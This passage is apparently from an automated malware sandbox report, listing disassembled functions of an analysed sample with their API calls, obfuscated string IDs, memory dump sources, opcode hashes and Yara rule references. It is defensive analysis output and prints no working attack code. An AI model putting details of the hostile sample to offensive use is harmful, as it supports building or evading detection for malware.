                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04938755
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: G@ZK$[@G_
                        • API String ID: 4132704954-2338778587
                        • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                        • Instruction ID: 0154eb31e13d0b26b83e0bc239a0b7ae8b8df5ca6d71fd6a65915dd517271d51
                        • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                        • Instruction Fuzzy Hash: E701F9B0F00244DFD720EFB8AC41A6DB7F0E75A311BA00579E536AB290DB75B805CB45
                        Function 049380E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04938155
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: G@ZK$[@G_
                        • API String ID: 4132704954-2338778587
                        • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                        • Instruction ID: 9ea551ca2fead215ac669ace56642b0bd9c838ccf4462e8239b184284072030c
                        • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                        • Instruction Fuzzy Hash: 6B0126F0F41204DBD720EFA8AC40A69B7B0AB0A300FA005B9F41957360DB7568418B05
                        Function 00407830 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00407899
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: @G@K$A@K.
                        • API String ID: 2296764815-2457859030
                        • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                        • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                        • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                        • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                        Function 00407940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004079A9
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: @G@K$ZYA.
                        • API String ID: 2296764815-4236202813
                        • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                        • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                        • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                        • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                        Function 00406DD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00406E39
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: ZF\K$three
                        • API String ID: 2296764815-3094064056
                        • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                        • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                        • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                        • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                        Function 04937037 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 049370A0
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: ZF\KK.$three
                        • API String ID: 4132704954-2602870784
                        • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                        • Instruction ID: d7a357c8b8883af396730166b8d527f34882388644f5c4959c9f41b75c20869b
                        • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                        • Instruction Fuzzy Hash: CF01D174F04208DBCB20DFE8E981B4CB3B0EF15715FA041BADC15A73A0D6746906EB0A
                        Function 04937A97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04937B00
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: @G@K$A@K.
                        • API String ID: 4132704954-2457859030
                        • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                        • Instruction ID: e0730a36e8afa3d07c0736974fce8f83555064825c1ae38fedb564027ca1915c
                        • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                        • Instruction Fuzzy Hash: 7B0181B4F002049FC720DFA8E946A5C77B0E74A301FA041BAE916A7390D7B5AA458B59
                        Function 04937BA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04937C10
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: @G@K$ZYA.
                        • API String ID: 4132704954-4236202813
                        • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                        • Instruction ID: 293682d3647b3749e9bcb64460e5a7b7aefd87d9dd79a71121011ec3ad66b951
                        • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                        • Instruction Fuzzy Hash: 6101D1B4F00304DFCB24EFA8E991A4C7BF0BB45711F9040BAD82557390C6B97945CB49
                        Function 00406C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00406C99
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: CGV.$mix
                        • API String ID: 2296764815-1644454629
                        • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                        • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                        • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                        • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
                        Function 04936EA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04936F00
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: CGV.$mix
                        • API String ID: 4132704954-1644454629
                        • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                        • Instruction ID: edff52b739511eaaa6cdc50f04c77816e2a67b842b9ff73b6f82ad4ae467e7fd
                        • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                        • Instruction Fuzzy Hash: CCF024B0F44208EBDB20EFA8E882F0C77E0AF46311FA00175E90697390D774BE058B59